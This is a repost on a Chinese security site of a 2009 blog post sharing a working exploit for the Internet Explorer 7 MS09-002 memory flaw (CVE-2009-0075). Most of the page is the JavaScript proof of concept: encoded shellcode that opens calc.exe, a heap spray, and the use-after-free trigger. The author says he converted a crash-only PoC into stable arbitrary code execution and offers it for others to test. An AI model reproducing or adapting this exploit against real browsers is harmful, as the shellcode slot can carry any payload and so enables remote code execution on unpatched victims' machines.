首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer 7.0 Exploit(MS09-002,可以执行任意代码)
来源:http://blog.wang1.cn/ 作者:Friddy 发布时间:2009-02-20  

Microsoft IE CFunctionPointer函数内存破坏漏洞(MS09-002)
发布时间:2009-02-10
影响版本:
Microsoft Internet Explorer 7.0

漏洞描述:
BUGTRAQ ID: 33627
CVE(CAN) ID: CVE-2009-0075

Comment by Friddy:
这个实际不是个破坏内存的漏洞,可以利用这个漏洞执行任意的代码。
今天我花了十几分钟修改了miliw0rm的只会造成DOS的POC,现在已经可以较为稳定执行任意代码。

测试平台:
Windows XP SP2+Internet Explorer 7.0

下面发出POC给各位安全爱好者测试,测试效果是弹出Windows的计算器(calc.exe)

JavaScript代码
  1. <!--   
  2. MS09-002 Internet Exploere 7.0 Exploit   
  3. Modify by Friddy 2009.02.19 mail:qianyang@ssyeah.com   
  4. blog:www.friddy.cn   
  5. Tested under Windows XP sp2+IE 7.0   
  6. shellcode will popup the calc.exe   
  7. -->   
  8.   
  9. <script language="JavaScript">   
  10. var shellcode=unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");   
  11.   
  12. var array = new Array();   
  13.   
  14. var ls = 0x100000-(shellcode.length*2+0x01020);   
  15.   
  16. var b = unescape("%u0D0D%u0D0D");   
  17. while(b.length<ls) { b+=b;}   
  18. var lh = b.substring(0,ls/2);   
  19. delete b;   
  20.   
  21. for(i=0; i<0xD0; i++) {   
  22. array[i] = lh + shellcode;   
  23. }   
  24.   
  25. CollectGarbage();   
  26.   
  27. var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");   
  28. var a1 = new Array();   
  29. for(var x=0;x<500;x++) a1.push(document.createElement("img"));   
  30. o1=document.createElement("tbody");   
  31. o1.click;   
  32. var o2 = o1.cloneNode();   
  33. o1.clearAttributes();   
  34. o1=null; CollectGarbage();   
  35. for(var x=0;x<a1.length;x++) a1[x].src=s1;   
  36. o2.click;   
  37. </script>  

 

测试了下:winxp sp3+ie7  进程崩溃


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Internet Explorer 7 Memory
·MS09-002利用代码
·Firepack (admin/ref.php) Remot
·Mail.com change profile cross
·Oracle 10g MDSYS.SDO_TOPO_DROP
·The FathFTP Active-X control s
·University of Washington IMAP
·Got All Media version 7.0.0.3
·MemHT Portal <= 4.0.1 (pvtmsg)
·MS Internet Explorer 7 Memory
·Falt4 CMS RC4 (fckeditor) Arbi
·MS Internet Explorer 7 Memory
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved